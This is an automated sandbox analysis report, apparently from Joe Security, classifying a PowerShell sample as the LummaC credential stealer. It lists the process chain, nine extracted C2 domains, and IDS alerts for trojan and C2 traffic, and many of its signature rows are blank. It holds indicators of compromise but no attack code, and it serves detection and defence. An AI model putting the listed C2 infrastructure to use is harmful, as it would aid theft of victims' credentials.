Windows
Analysis Report
176.113.115.225.ps1
Overview
General Information
Detection
Score: | 100 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
- System is w10x64
powershell.exe (PID: 7816 cmdline:
"C:\Window s\System32 \WindowsPo werShell\v 1.0\powers hell.exe" -noLogo -E xecutionPo licy unres tricted -f ile "C:\Us ers\user\D esktop\176 .113.115.2 25.ps1" MD5: 04029E121A0CFA5991749937DD22A1D9) conhost.exe (PID: 7824 cmdline:
C:\Windows \system32\ conhost.ex e 0xffffff ff -ForceV 1 MD5: 0D698AF330FD17BEE3BF90011D49251D) RegSvcs.exe (PID: 8024 cmdline:
"C:\Window s\Microsof t.NET\Fram ework\v4.0 .30319\Reg Svcs.exe" MD5: 9D352BC46709F0CB5EC974633A0C3C94) wermgr.exe (PID: 8040 cmdline:
"C:\Window s\system32 \wermgr.ex e" "-outpr oc" "0" "7 816" "2580 " "2544" " 1988" "0" "0" "2592" "0" "0" " 0" "0" "0" MD5: 74A0194782E039ACE1F7349544DC1CF4)
- cleanup
{
"C2 url": [
"pleasedcfrown.biz",
"affordtempyo.biz",
"mixedrecipew.biz",
"hoursuhouy.biz",
"suggestyuoz.biz",
"lightdeerysua.biz",
"toppyneedus.biz",
"impolitewearr.biz",
"grapeprivatter.cyou"
]
}
Source | Rule | Description | Author | Strings |
---|---|---|---|---|
JoeSecurity_LummaCStealer_3 | Yara detected LummaC Stealer | Joe Security | ||
JoeSecurity_LummaCStealer_2 | Yara detected LummaC Stealer | Joe Security |
Source: | Author: frack113: |
Source: | Author: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:21.067993+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2028371 | 3 | Unknown Traffic | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:21.593553+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.688671+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.908893+0100 | 2054653 | 1 | A Network Trojan was detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:21.593553+0100 | 2049836 | 1 | A Network Trojan was detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:22.688671+0100 | 2049812 | 1 | A Network Trojan was detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:21.067993+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49743 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:22.192148+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49751 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:23.347094+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:24.600432+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49771 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:26.035507+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49782 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:27.552936+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49791 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:29.081608+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49802 | 104.21.29.142 | 443 | TCP |
2025-01-27T15:58:33.152602+0100 | 2059424 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 49826 | 104.21.29.142 | 443 | TCP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:20.506711+0100 | 2059421 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61999 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:20.519335+0100 | 2059423 | 1 | Domain Observed Used for C2 Detected | 192.168.2.7 | 61168 | 1.1.1.1 | 53 | UDP |
Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol |
---|---|---|---|---|---|---|---|---|
2025-01-27T15:58:24.082393+0100 | 2048094 | 1 | Malware Command and Control Activity Detected | 192.168.2.7 | 49759 | 104.21.29.142 | 443 | TCP |
- • AV Detection
- • Cryptography
- • Compliance
- • Software Vulnerabilities
- • Networking
- • Key, Mouse, Clipboard, Microphone and Screen Capturing
- • System Summary
- • Data Obfuscation
- • Hooking and other Techniques for Hiding and Protection
- • Malware Analysis System Evasion
- • Anti Debugging
- • HIPS / PFW / Operating System Protection Evasion
- • Language, Device and Operating System Detection
- • Lowering of HIPS / PFW / Operating System Security Settings
- • Stealing of Sensitive Information
- • Remote Access Functionality
Click to jump to signature section
AV Detection |
---|
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: | ||
Source: | Avira URL Cloud: |
Source: | Malware Configuration Extractor: |
Source: | Virustotal: | Perma Link |
Source: | Integrated Neural Analysis Model: |
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: | ||
Source: | String decryptor: |
Source: | Code function: | 3_2_0041E081 |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Binary string: |
Source: | Code function: | 3_2_004100EC | |
Source: | Code function: | 3_2_0040CA90 | |
Source: | Code function: | 3_2_00445B30 | |
Source: | Code function: | 3_2_0042CBE0 | |
Source: | Code function: | 3_2_0043EC10 | |
Source: | Code function: | 3_2_0043EC10 | |
Source: | Code function: | 3_2_00429F42 | |
Source: | Code function: | 3_2_0040CF60 | |
Source: | Code function: | 3_2_00412762 | |
Source: | Code function: | 3_2_00412762 | |
Source: | Code function: | 3_2_0040F717 | |
Source: | Code function: | 3_2_00443F26 | |
Source: | Code function: | 3_2_004467E0 | |
Source: | Code function: | 3_2_004467E0 | |
Source: | Code function: | 3_2_00419000 | |
Source: | Code function: | 3_2_00419000 | |
Source: | Code function: | 3_2_00419000 | |
Source: | Code function: | 3_2_0042D020 | |
Source: | Code function: | 3_2_0042E03E | |
Source: | Code function: | 3_2_004450C0 | |
Source: | Code function: | 3_2_004450D9 | |
Source: | Code function: | 3_2_004450DB | |
Source: | Code function: | 3_2_0042D14A | |
Source: | Code function: | 3_2_00427150 | |
Source: | Code function: | 3_2_0041C955 | |
Source: | Code function: | 3_2_0041C955 | |
Source: | Code function: | 3_2_00430930 | |
Source: | Code function: | 3_2_0043F9C0 | |
Source: | Code function: | 3_2_0043F9C0 | |
Source: | Code function: | 3_2_0043F9C0 | |
Source: | Code function: | 3_2_004441FF | |
Source: | Code function: | 3_2_0042FA03 | |
Source: | Code function: | 3_2_00442200 | |
Source: | Code function: | 3_2_00444A31 | |
Source: | Code function: | 3_2_0040DAC0 | |
Source: | Code function: | 3_2_0042AAC2 | |
Source: | Code function: | 3_2_0043428A | |
Source: | Code function: | 3_2_00420289 | |
Source: | Code function: | 3_2_0042AA89 | |
Source: | Code function: | 3_2_0040A360 | |
Source: | Code function: | 3_2_0040A360 | |
Source: | Code function: | 3_2_0040E360 | |
Source: | Code function: | 3_2_00433B7D | |
Source: | Code function: | 3_2_00445310 | |
Source: | Code function: | 3_2_004343D8 | |
Source: | Code function: | 3_2_00431BE0 | |
Source: | Code function: | 3_2_004343EF | |
Source: | Code function: | 3_2_00434393 | |
Source: | Code function: | 3_2_004433A1 | |
Source: | Code function: | 3_2_004433A1 | |
Source: | Code function: | 3_2_004433A1 | |
Source: | Code function: | 3_2_004453B0 | |
Source: | Code function: | 3_2_00411BBF | |
Source: | Code function: | 3_2_00419C65 | |
Source: | Code function: | 3_2_00426C20 | |
Source: | Code function: | 3_2_0040DD4A | |
Source: | Code function: | 3_2_0040EDC8 | |
Source: | Code function: | 3_2_004105D0 | |
Source: | Code function: | 3_2_0042F59D | |
Source: | Code function: | 3_2_0043BDB0 | |
Source: | Code function: | 3_2_00443634 | |
Source: | Code function: | 3_2_00443634 | |
Source: | Code function: | 3_2_00420EC3 | |
Source: | Code function: | 3_2_00420EC3 | |
Source: | Code function: | 3_2_004206EB | |
Source: | Code function: | 3_2_0042EE95 | |
Source: | Code function: | 3_2_00418F40 | |
Source: | Code function: | 3_2_00421748 | |
Source: | Code function: | 3_2_00421748 | |
Source: | Code function: | 3_2_0041BF76 | |
Source: | Code function: | 3_2_0041BF76 | |
Source: | Code function: | 3_2_0041BF76 | |
Source: | Code function: | 3_2_0041BF76 | |
Source: | Code function: | 3_2_00442710 | |
Source: | Code function: | 3_2_00421735 | |
Source: | Code function: | 3_2_00421735 | |
Source: | Code function: | 3_2_00425FF3 | |
Source: | Code function: | 3_2_00444F80 | |
Source: | Code function: | 3_2_0040EF95 | |
Source: | Code function: | 3_2_0041D797 | |
Source: | Code function: | 3_2_0041D797 | |
Source: | Code function: | 3_2_0041FFA1 | |
Source: | Code function: | 3_2_00444FB0 |
Networking |
---|
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: | ||
Source: | URLs: |
Source: | IP Address: |
Source: | JA3 fingerprint: |
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: | ||
Source: | Suricata IDS: |
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: | ||
Source: | HTTP traffic detected: |
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: | ||
Source: | UDP traffic detected without corresponding DNS query: |
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: | ||
Source: | DNS traffic detected: |
Source: | HTTP traffic detected: |
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: | ||
Source: | String found in binary or memory: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Code function: | 3_2_0043A020 |
Source: | Code function: | 3_2_0043A020 |
Source: | Code function: | 3_2_0043A1C0 |
Source: | Window created: | Jump to behavior |
Source: | Code function: | 0_2_00007FFAAC48211D | |
Source: | Code function: | 3_2_0043E8D0 | |
Source: | Code function: | 3_2_0043388C | |
Source: | Code function: | 3_2_0040BA50 | |
Source: | Code function: | 3_2_0040CA90 | |
Source: | Code function: | 3_2_00445B30 | |
Source: | Code function: | 3_2_0042CBE0 | |
Source: | Code function: | 3_2_0043EC10 | |
Source: | Code function: | 3_2_00426420 | |
Source: | Code function: | 3_2_0041CEE6 | |
Source: | Code function: | 3_2_00429F42 | |
Source: | Code function: | 3_2_00412762 | |
Source: | Code function: | 3_2_0040F717 | |
Source: | Code function: | 3_2_004467E0 | |
Source: | Code function: | 3_2_00401040 | |
Source: | Code function: | 3_2_00425850 | |
Source: | Code function: | 3_2_00409000 | |
Source: | Code function: | 3_2_00419000 | |
Source: | Code function: | 3_2_0043E000 | |
Source: | Code function: | 3_2_00436010 | |
Source: | Code function: | 3_2_00446010 | |
Source: | Code function: | 3_2_0042D020 | |
Source: | Code function: | 3_2_004450C0 | |
Source: | Code function: | 3_2_004228D0 | |
Source: | Code function: | 3_2_004450D9 | |
Source: | Code function: | 3_2_004450DB | |
Source: | Code function: | 3_2_004300E0 | |
Source: | Code function: | 3_2_0042A8F0 | |
Source: | Code function: | 3_2_0041B0F4 | |
Source: | Code function: | 3_2_0040D0B0 | |
Source: | Code function: | 3_2_004048B2 | |
Source: | Code function: | 3_2_004380B0 | |
Source: | Code function: | 3_2_0042F0B5 | |
Source: | Code function: | 3_2_0042D14A | |
Source: | Code function: | 3_2_00427150 | |
Source: | Code function: | 3_2_0041C955 | |
Source: | Code function: | 3_2_0043395B | |
Source: | Code function: | 3_2_00413100 | |
Source: | Code function: | 3_2_0041A120 | |
Source: | Code function: | 3_2_0043F9C0 | |
Source: | Code function: | 3_2_0042DA42 | |
Source: | Code function: | 3_2_0042E240 | |
Source: | Code function: | 3_2_0043DA4B | |
Source: | Code function: | 3_2_0042C250 | |
Source: | Code function: | 3_2_0043E260 | |
Source: | Code function: | 3_2_00435A69 | |
Source: | Code function: | 3_2_00416200 | |
Source: | Code function: | 3_2_00424230 | |
Source: | Code function: | 3_2_00444A31 | |
Source: | Code function: | 3_2_0042AAC2 | |
Source: | Code function: | 3_2_0042EAC0 | |
Source: | Code function: | 3_2_00422280 | |
Source: | Code function: | 3_2_0043428A | |
Source: | Code function: | 3_2_00433AA0 | |
Source: | Code function: | 3_2_004402A0 | |
Source: | Code function: | 3_2_00421B50 | |
Source: | Code function: | 3_2_0040A360 | |
Source: | Code function: | 3_2_0040E360 | |
Source: | Code function: | 3_2_0042E367 | |
Source: | Code function: | 3_2_00413309 | |
Source: | Code function: | 3_2_00445310 | |
Source: | Code function: | 3_2_00402B30 | |
Source: | Code function: | 3_2_00434BE0 | |
Source: | Code function: | 3_2_004343EF | |
Source: | Code function: | 3_2_004463F0 | |
Source: | Code function: | 3_2_00408B90 | |
Source: | Code function: | 3_2_00434393 | |
Source: | Code function: | 3_2_0041B3A0 | |
Source: | Code function: | 3_2_004433A1 | |
Source: | Code function: | 3_2_004363AF | |
Source: | Code function: | 3_2_004453B0 | |
Source: | Code function: | 3_2_00411BBF | |
Source: | Code function: | 3_2_0041FC4E | |
Source: | Code function: | 3_2_00426C20 | |
Source: | Code function: | 3_2_0042A4E0 | |
Source: | Code function: | 3_2_0042FE49 | |
Source: | Code function: | 3_2_00413CB0 | |
Source: | Code function: | 3_2_0043D560 | |
Source: | Code function: | 3_2_0042DD6D | |
Source: | Code function: | 3_2_0041A51C | |
Source: | Code function: | 3_2_004105D0 | |
Source: | Code function: | 3_2_00409580 | |
Source: | Code function: | 3_2_00403590 | |
Source: | Code function: | 3_2_0040BDA0 | |
Source: | Code function: | 3_2_00439DA0 | |
Source: | Code function: | 3_2_0041E5B0 | |
Source: | Code function: | 3_2_0042FE49 | |
Source: | Code function: | 3_2_0040C660 | |
Source: | Code function: | 3_2_00407E60 | |
Source: | Code function: | 3_2_00421E70 | |
Source: | Code function: | 3_2_00443634 | |
Source: | Code function: | 3_2_00420EC3 | |
Source: | Code function: | 3_2_0043F6C0 | |
Source: | Code function: | 3_2_004156CB | |
Source: | Code function: | 3_2_004456E0 | |
Source: | Code function: | 3_2_00433698 | |
Source: | Code function: | 3_2_004226A0 | |
Source: | Code function: | 3_2_0042A750 | |
Source: | Code function: | 3_2_00402760 | |
Source: | Code function: | 3_2_00428764 | |
Source: | Code function: | 3_2_0041BF76 | |
Source: | Code function: | 3_2_0043C778 | |
Source: | Code function: | 3_2_0042BF00 | |
Source: | Code function: | 3_2_0043FF00 | |
Source: | Code function: | 3_2_00442710 | |
Source: | Code function: | 3_2_00403FD0 | |
Source: | Code function: | 3_2_0040EF95 | |
Source: | Code function: | 3_2_0041D797 | |
Source: | Code function: | 3_2_00444FB0 |
Source: | Classification label: |
Source: | Code function: | 3_2_0043EC10 |
Source: | File created: | Jump to behavior |
Source: | Mutant created: | ||
Source: | Mutant created: | ||
Source: | Mutant created: |
Source: | File created: | Jump to behavior |
Source: | File read: | Jump to behavior |
Source: | Key opened: | Jump to behavior |
Source: | Virustotal: |
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | |||
Source: | Process created: | Jump to behavior | ||
Source: | Process created: | Jump to behavior |
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior | ||
Source: | Section loaded: | Jump to behavior |
Source: | Window detected: |
Source: | File opened: | Jump to behavior |
Source: | Binary string: |
Source: | Code function: | 3_2_0043904F | |
Source: | Code function: | 3_2_0044B0E1 | |
Source: | Code function: | 3_2_0044B0DD | |
Source: | Code function: | 3_2_0044B0FD | |
Source: | Code function: | 3_2_0044B145 | |
Source: | Code function: | 3_2_0044B545 | |
Source: | Code function: | 3_2_0044B541 | |
Source: | Code function: | 3_2_0044F6B3 | |
Source: | Code function: | 3_2_0041F781 | |
Source: | Code function: | 3_2_00444F81 |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Malware Analysis System Evasion |
---|
Source: | WMI Queries: |
Source: | System information queried: | Jump to behavior |
Source: | Thread delayed: | Jump to behavior |
Source: | Window / User API: | Jump to behavior | ||
Source: | Window / User API: | Jump to behavior |
Source: | Thread sleep time: | Jump to behavior |
Source: | File opened: | Jump to behavior |
Source: | WMI Queries: |
Source: | Thread delayed: | Jump to behavior |
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
Source: | Binary or memory string: | ||
